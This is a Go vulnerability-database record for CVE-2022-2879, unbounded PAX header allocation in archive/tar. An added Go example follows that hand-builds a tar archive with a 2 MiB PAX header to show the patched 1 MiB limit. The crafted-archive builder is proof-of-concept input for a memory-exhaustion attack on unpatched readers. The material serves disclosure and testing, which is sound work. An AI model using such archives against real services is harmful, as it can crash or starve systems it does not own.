modules:
  - module: std
    versions:
      - fixed: 1.18.7
      - introduced: 1.19.0
        fixed: 1.19.2
    vulnerable_at: 1.19.1
    packages:
      - package: archive/tar
        symbols:
          - Reader.next
          - parsePAX
          - Writer.writePAXHeader
        derived_symbols:
          - Reader.Next
          - Writer.WriteHeader
description: |
    Reader.Read does not set a limit on the maximum size of file headers.
    A maliciously crafted archive could cause Read to allocate unbounded
    amounts of memory, potentially causing resource exhaustion or panics.
    After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.
credit: Adam Korczynski (ADA Logics) and OSS-Fuzz
references:
  - report: https://go.dev/issue/54853
  - fix: https://go.dev/cl/439355
  - web: https://groups.google.com/g/golang-announce/c/xtuG5faxtaU
cve_metadata:
    id: CVE-2022-2879
    cwe: 'CWE 400: Uncontrolled Resource Consumption'
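The following is an added example, not part of the vulndb record or of the Go project's own code. It demonstrates the header-size limit the record describes: it hand-assembles two tar archives, one with a legitimate PAX extended header (a 128-byte path, longer than the 100-byte ustar name field) and one whose PAX header entry claims, and actually carries, about 2 MiB of records. The raw header builder, the PAX record formatter and the helper names are the example's own; archive/tar's Writer refuses to emit TypeXHeader entries directly, so a crafted header has to be assembled at the byte level. On Go 1.18.7 / 1.19.2 and later, `Reader.Next` stops after 1 MiB of the hostile header and returns `tar.ErrFieldTooLong`; on the affected versions the same input makes `Next` buffer the whole header in memory, and behind a gzip stream the attacker pays only for the compressed bytes.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// blockSize is the tar header and record block size.
const blockSize = 512

// longPAXPath is the path carried by the legitimate PAX header (128 bytes,
// longer than the ustar name field).
var longPAXPath = strings.Repeat("d/", 60) + "file.txt"

// rawHeader builds one 512-byte ustar header block by hand (example helper).
func rawHeader(name string, typeflag byte, size int64) []byte {
	blk := make([]byte, blockSize)
	copy(blk[0:100], name)                             // name
	copy(blk[100:108], fmt.Sprintf("%07o\x00", 0o644)) // mode
	copy(blk[108:116], "0000000\x00")                  // uid
	copy(blk[116:124], "0000000\x00")                  // gid
	copy(blk[124:136], fmt.Sprintf("%011o\x00", size)) // size, octal
	copy(blk[136:148], "00000000000\x00")              // mtime
	copy(blk[148:156], "        ")                     // chksum: spaces while summing
	blk[156] = typeflag                                // 'x' = PAX extended header
	copy(blk[257:263], "ustar\x00")                    // magic
	copy(blk[263:265], "00")                           // version
	copy(blk[329:337], "0000000\x00")                  // devmajor
	copy(blk[337:345], "0000000\x00")                  // devminor
	var sum int
	for _, b := range blk {
		sum += int(b)
	}
	copy(blk[148:156], fmt.Sprintf("%06o\x00 ", sum)) // unsigned checksum
	return blk
}

// padToBlock pads an entry body to a multiple of 512 bytes.
func padToBlock(data []byte) []byte {
	if rem := len(data) % blockSize; rem != 0 {
		data = append(data, make([]byte, blockSize-rem)...)
	}
	return data
}

// paxRecord formats "<len> <key>=<value>\n", where <len> counts the whole
// record including its own digits.
func paxRecord(key, value string) string {
	size := len(key) + len(value) + 3 // ' ', '=', '\n'
	size += len(strconv.Itoa(size))
	rec := strconv.Itoa(size) + " " + key + "=" + value + "\n"
	if len(rec) != size { // adding the digits grew the digit count
		size = len(rec)
		rec = strconv.Itoa(size) + " " + key + "=" + value + "\n"
	}
	return rec
}

// paxArchive returns a minimal archive: a PAX extended header carrying
// paxBody, the regular file it applies to, and the end-of-archive marker.
func paxArchive(paxBody []byte) []byte {
	var buf bytes.Buffer
	buf.Write(rawHeader("PaxHeaders/file", tar.TypeXHeader, int64(len(paxBody))))
	buf.Write(padToBlock(paxBody))
	buf.Write(rawHeader("file", tar.TypeReg, 0))
	buf.Write(make([]byte, 2*blockSize)) // two zero blocks end the archive
	return buf.Bytes()
}

// legitimatePAX builds an archive whose PAX header carries longPAXPath.
func legitimatePAX() []byte {
	return paxArchive([]byte(paxRecord("path", longPAXPath)))
}

// hostilePAX builds an archive whose PAX header carries a single record of
// roughly 2 MiB (constructed input, twice the 1 MiB limit of the fix).
func hostilePAX() []byte {
	return paxArchive([]byte(paxRecord("path", strings.Repeat("a", 2<<20))))
}

// readFirstEntry returns the name of the first visible entry, or the error
// that Reader.Next reports.
func readFirstEntry(archive []byte) (string, error) {
	tr := tar.NewReader(bytes.NewReader(archive))
	hdr, err := tr.Next()
	if err != nil {
		return "", err
	}
	return hdr.Name, nil
}

func main() {
	name, err := readFirstEntry(legitimatePAX())
	fmt.Printf("legitimate PAX header: name length %d, err=%v\n", len(name), err)

	_, err = readFirstEntry(hostilePAX())
	fmt.Printf("2 MiB PAX header: err=%v, ErrFieldTooLong=%t\n",
		err, errors.Is(err, tar.ErrFieldTooLong))
}
```

The checksum is computed with the chksum field set to spaces, which is how archive/tar's reader verifies it; the body size in the header is what drives the allocation on unpatched versions, so the crafted entry must both declare and supply the oversized body for the patched reader's limit to trigger rather than an unexpected-EOF error.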